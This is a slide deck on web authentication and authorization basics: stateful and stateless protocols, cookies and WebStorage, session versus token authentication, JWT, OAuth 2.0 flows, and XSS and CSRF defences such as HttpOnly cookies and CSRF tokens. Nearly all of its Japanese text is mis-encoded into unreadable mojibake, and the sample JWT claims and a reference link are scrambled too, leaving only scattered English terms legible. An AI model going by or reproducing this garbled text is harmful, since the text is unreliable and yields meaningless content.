Tweet
Tweet

Slide 1

Slide 1 text

ਔՊ ढ़੖ ೝূɾೝՄͷ࢓૊ΈΛཧղ͢Δ্Ͱ ஌͓͖͍ͬͯͨجૅ஌ࣝ 

Slide 2

Slide 2 text

໨࣍  • ࠓճ࿩͢಺༰ • ηογϣϯʹؔ͢Δجૅ஌ࣝ • ೝূɾೝՄʹ͍ͭͯ • ೝূͷ۩ମతͳ࣮૷ख๏ • ·ͱΊ

Slide 3

Slide 3 text

໨࣍  • ࠓճ࿩͢಺༰ • ηογϣϯʹؔ͢Δجૅ஌ࣝ • ೝূɾೝՄʹ͍ͭͯ • ೝূͷ۩ମతͳ࣮૷ख๏ • ·ͱΊ

Slide 4

Slide 4 text

• ೝূͱೝՄͷҧ͍ʹ͍ͭͯ
 • ηογϣϯೝূͱτʔΫϯೝূͷҧ͍ʹ͍ͭͯ
 • ೝূͷηΩϡϦςΟϦεΫXSSɾCSRFʹ͍ͭͯ  ೝূɾೝՄʹؔ͢Δ֓ཁͱجૅ஌ࣝͷڞ༗ ϞϊϦγοΫͳΞϓϦΛ෼ׂ͢Δʹ͋ͨΓɺೝূɾೝՄͷ࣮૷ํ๏ ͷݕ౼͸ආ͚ͯ͸௨Ε·ͤΜɻ
 Լ४උͱͯ͠ɺࠓճ͸ೝূɾೝՄͷجૅ஌ࣝʹ͍ͭͯ·ͱΊ·ͨ͠

Slide 5

Slide 5 text

໨࣍  • ࠓճ࿩͢಺༰ • ηογϣϯʹؔ͢Δجૅ஌ࣝ • ೝূɾೝՄʹ͍ͭͯ • ೝূ࣮૷ख๏ • ·ͱΊ

Slide 6

Slide 6 text

• εςʔτϑϧ • ݱࡏͷঢ়ଶΛ΋ͭ • ྫ: FTP, TCP, BGP, OSPF, EIGRP, SMTP, SSH • εςʔτϨε • ݱࡏͷঢ়ଶΛ΋ͨͳ͍ • ྫ: HTTP, UDP, IP, DNS  εςʔτϑϧͱεςʔτϨεʹ͍ͭͯ σʔλ௨৴ʹ͸εςʔτϑϧͱεςʔτϨεͷ2छྨ͕͋Δ

Slide 7

Slide 7 text

εςʔτϑϧͳ΍ΓͱΓ  ͝஫จ͸ʁ ηοτͷυϦϯΫ͸ʁ ళ಺Ͱঌ্͕͠Γ·͔͢ʁ ϋϯόʔΨʔηοτ͍ͩ͘͞ ίʔϥ͍ͩ͘͞ ͸͍

Slide 8

Slide 8 text

εςʔτϨεͳ΍ΓͱΓ  ͝஫จ͸ʁ ηοτͷ৔߹ɺυϦϯΫ΋஫จͯ͠Լ͍͞ ஫จͷࡍ͸ళ಺Ͱঌ্͕͠Δ͔͓఻͑Լ͍͞ ϋϯόʔΨʔηοτ͍ͩ͘͞ ϋϯόʔΨʔηοτͱίʔϥ͍ͩ͘͞ ϋϯόʔΨʔηοτͱίʔϥ͍ͩ͘͞ ళ಺Ͱ৯΂·͢

Slide 9

Slide 9 text

• WebαΠτ͸HTTP௨৴Λར༻͢ΔͷͰεςʔτϨε • ࣮ࡍʹ͸ECαΠτͷʮങ͍෺Χΰʯ౳ɺঢ়ଶʹԠͯ͡
 αΠτͷڍಈΛม͍͑ͨ  ηογϣϯͷඞཁੑ HTTP௨৴ͰεςʔτϑϧΛ࣮ݱ͢ΔͨΊͷ໾ׂ͕ηογϣϯ

Slide 10

Slide 10 text

• Cookie
 • WebStorage • SessionStorage • LocalStorage  ηογϣϯ৘ใͷอଘઌ ΫϥΠΞϯτ(ϒϥ΢β)ʹ͸CookieͱWebStorageͷ2छྨ͕ଘࡏ

Slide 11

Slide 11 text

• αʔόʔଆͷηογϣϯΛ؅ཧ͢ΔͨΊͷ΋ͷ • 4KBͷσʔλαΠζ੍໿͕͋Δ • ΫϥΠΞϯτ͔Βαʔόʔ΁ͷϦΫΤετ࣌͸ࣗಈૹ৴ • αʔόʔ͔ΒΫϥΠΞϯτ΁ͷϨεϙϯε࣌͸
 Set-Cookieϔομʔʹηοτͯ͠ૹΒΕΔ  ηογϣϯ৘ใͷอଘઌ: Cookie

Slide 12

Slide 12 text

• ΫϥΠΞϯτଆͷηογϣϯΛ؅ཧ͢Δ΋ͷ • ΫϥΠΞϯτଆͰར༻Ͱ͖ΔσʔλϕʔεͷΑ͏ͳ΋ͷ • ϒϥ΢β͕։͍ͯΔ͚࣌ͩར༻ՄೳͳʮSessionStorageʯ • ӬଓతʹσʔλΛอଘͰ͖ΔʮLocalStorageʯ  ηογϣϯ৘ใͷอଘઌ: WebStorage

Slide 13

Slide 13 text

໨࣍  • ࠓճ࿩͢಺༰ • ηογϣϯʹؔ͢Δجૅ஌ࣝ • ೝূɾೝՄʹ͍ͭͯ • ೝূͷ۩ମతͳ࣮૷ख๏ • ·ͱΊ

Slide 14

Slide 14 text

• ೝূʢAuthenticationʣ • ୭Ͱ͋Δ͔Λ֬ೝ͢Δ͜ͱ • ྫ: ύεϫʔυೝূɺࢦ໲ೝূͳͲ • ೝূʹࣦഊͨ͠ͱ͖ͷΤϥʔ͸ʮ401 Unauthorizedʯ • ೝՄʢAuthorizationʣ • ૢ࡞ͷݖݶΛ༩͑Δ͜ͱ • ྫ: Ӿཡ੍ݶͷ͋Δϖʔδ΁ͷΞΫηεͳͲ • ݖݶෆ଍ʹΑΔΤϥʔ͸ʮ403 Forbiddenʯ  ೝূͱೝՄͷҧ͍

Slide 15

Slide 15 text

 ೝূͷख๏ʹ͍ͭͯ ηογϣϯ΂ʔεͷೝূ
 ʢεςʔτϑϧʣ τʔΫϯϕʔεͷೝূ
 ʢεςʔτϨεʣ

Slide 16

Slide 16 text

 ηογϣϯ΂ʔεͷೝূ 1. ΫϨσϯγϟϧΛPOST 2. ೝূ੒ޭޙɺηογϣϯ৘ใ ͕ฦͬͯ͘Δ 3. ηογϣϯ৘ใΛར༻ͯ͠
 ೝՄ௨৴Λߦ͏

Slide 17

Slide 17 text

 τʔΫϯϕʔεͷೝূʢ1/3ʣ 1. ΫϨσϯγϟϧΛPOST 2. ೝূ੒ޭޙɺτʔΫϯ͕ฦͬͯ ͘Δ 3. τʔΫϯΛར༻ͯ͠ೝՄ௨৴Λ ߦ͏
 ɾํ๏1: Authorizationϔομʔʹ τʔΫϯΛηοτ
 ɾํ๏2: CookieʹτʔΫϯΛอଘ

Slide 18

Slide 18 text

• ࣝผࢠܕ • DBʹτʔΫϯͷ৘ใΛอଘ͓ͯ͘͠λΠϓͷτʔΫϯ • ಺แܕ • ΞΫηετʔΫϯʹඥ෇͘৘ใΛΞΫηετʔΫϯࣗମͷதʹຒ ΊࠐΉ΋ͷɻ • JWT͸಺แܕ  τʔΫϯϕʔεͷೝূʢ2/3ʣ τʔΫϯͷछྨʹ͍ͭͯ \ lTDPQFzlYYYz  lDMJFOU@JEzlYYYz  lFYQzlYYYz  lJBUzlYYYz  lTVCzlYYYz  lJTTzlYYYz  lKUJzlYYYz ^ ಺แܕ ࣝผࢠܕ

Slide 19

Slide 19 text

• OAuth2.0ʹ͍ͭͯ • τʔΫϯͷܗࣜ΍ɺτʔΫϯͷཁٻͱͦͷԠ౴ͳͲɺ
 τʔΫϯͷ࢓༷Λඪ४Խͨ͠΋ͷ • ʮೝՄʯΛඪ४Խͨ͠΋ͷͰ͋Γʮೝূʯ෦෼͸
 είʔϓ֎ • OAuth2.0Ͱඪ४Խ͞Ε͍ͯΔϑϩʔ • ೝՄίʔυϑϩʔ • ΠϯϓϦγοτϑϩʔ • ϦιʔεΦʔφʔɾύεϫʔυɾΫϨσϯγϟϧζϑϩʔ • ΫϥΠΞϯτɾΫϨσϯγϟϧζϑϩʔ • ϦϑϨογϡτʔΫϯϑϩʔ  τʔΫϯϕʔεͷೝূʢ3/3ʣ

Slide 20

Slide 20 text

• XSS • ѱҙͷ͋ΔJavaScript͕ΫϥΠΞϯτଆͰ࣮ߦ͞Εɺ
 ػີ৘ใ͕ൈ͔ΕΔͳͲͷඃ֐͕ൃੜ͢Δ੬ऑੑ • ΫϥΠΞϯτଆͰൃੜ͢Δ੬ऑੑ • CSRF • ѱҙͷ͋ΔϦΫΤετΛαʔόʔड͚෇͚ɺ
 ҙਤ͠ͳ͍ॲཧ͕ߦΘΕͯ͠·͏੬ऑੑ • αʔόʔଆͰൃੜ͢Δ੬ऑੑ  ೝূɾೝՄʹ͓͚ΔηΩϡϦςΟϦεΫ

Slide 21

Slide 21 text

໨࣍  • ࠓճ࿩͢಺༰ • ηογϣϯʹؔ͢Δجૅ஌ࣝ • ೝূɾೝՄʹ͍ͭͯ • ೝূͷ۩ମతͳ࣮૷ख๏ • ·ͱΊ

Slide 22

Slide 22 text

• ηογϣϯϕʔε • τʔΫϯϕʔε • CookieʹอଘɺϦΫΤετ࣌ʹCookieΛࣗಈૹ৴ • CookieʹอଘɺAuthorizationϔομʔʹ෇༩ͯ͠ϦΫΤετ • LocalStorageʹอଘɺAuthorizationϔομʔʹ෇༩ͯ͠
 ϦΫΤετ  ೝূɾೝՄͷख๏·ͱΊ ηογϣϯϕʔε1ͭɺτʔΫϯϕʔε3ͭͷ߹ܭ4छྨΛ঺հ ࢀߟIUUQTRJJUBDPN)JSPNJJUFNTFBGGE

Slide 23

Slide 23 text

• XSSରࡦ • Cookieʹhttp:onlyΛ͚ͭΔ͜ͱͰJavaScriptͰΞΫηε
 Ͱ͖ͳ͍Α͏ʹ͢Δ • CSRFରࡦ • CSRFτʔΫϯ • ύεϫʔυΛ࠶౓ೖྗ͢Δ࢓༷ʹ͢Δ  ηογϣϯϕʔε Cookie͸ࣗಈૹ৴͞ΕΔͷͰɺѱҙͷ͋ΔϦΫΤετ͔൑ผ
 ͢ΔͨΊʹCSRFରࡦʹ͍ͭͯߟ͑Δඞཁ͕͋Δ

Slide 24

Slide 24 text

• XSSରࡦ • Cookieʹhttp:onlyΛ͚ͭΔ͜ͱͰJavaScriptͰΞΫηε
 Ͱ͖ͳ͍Α͏ʹ͢Δ • CSRFରࡦ • CSRFτʔΫϯ • ύεϫʔυΛ࠶౓ೖྗ͢Δ࢓༷ʹ͢Δ  τʔΫϯϕʔε: Cookieʹอଘɾૹ৴ ηογϣϯϕʔεͷ࣌ͱಉ͡

Slide 25

Slide 25 text

• XSSରࡦ • ϑϨʔϜϫʔΫͷػೳΛར༻ͯ͠ϥΠϒϥϦʹ੬ऑੑ͕
 ͳ͍͔νΣοΫ • CSRFରࡦ • CookieͷτʔΫϯ͸ݕূͰར༻͠ͳ͍ͷͰߟྀෆཁ  τʔΫϯϕʔε: Cookieʹอଘɾϔομʔૹ৴ ϔομʔʹηοτ͢ΔτʔΫϯΛCookie͔ΒऔΓग़ͨ͢Ίʹ͸ http:falseʹ͠ͳ͍ͱ͍͚ͳ͍ͷͰXSS੬ऑੑ͕ൃੜ͢Δ

Slide 26

Slide 26 text

• XSSରࡦ • ϑϨʔϜϫʔΫͷػೳΛར༻ͯ͠ϥΠϒϥϦʹ੬ऑੑ͕
 ͳ͍͔νΣοΫ • CSRFରࡦ • LocalStorageͷσʔλ͸ϦΫΤετ࣌ʹࣗಈͰૹΒΕΔ͜ ͱ͸ͳ͍ͷͰߟྀෆཁ  τʔΫϯϕʔε: LocalStorageʹอଘɾϔομʔૹ৴ LocalStorage͸JavaScriptͰΞΫηεͰ͖ΔͷͰXSSͷϦεΫ ͋Γ

Slide 27

Slide 27 text

໨࣍  • ࠓճ࿩͢಺༰ • ηογϣϯʹؔ͢Δجૅ஌ࣝ • ೝূɾೝՄʹ͍ͭͯ • ೝূͷ۩ମతͳ࣮૷ख๏ • ·ͱΊ

Slide 28

Slide 28 text

• ೝূ͸୭Ͱ͋Δ͔Λ֬ೝ͢Δ͜ͱɺೝՄ͸ૢ࡞ͷݖݶΛ༩͑ Δ͜ͱ
 • ೝূํ๏ʹ͸ηογϣϯํࣜͱτʔΫϯํࣜͷ2͕ͭ͋Δ
 • ೝূͷ࢓૊ΈΛ࣮૷͢Δ৔߹͸XSSͱCSRFͷ੬ऑੑΛҙࣝ ͢Δ  ·ͱΊ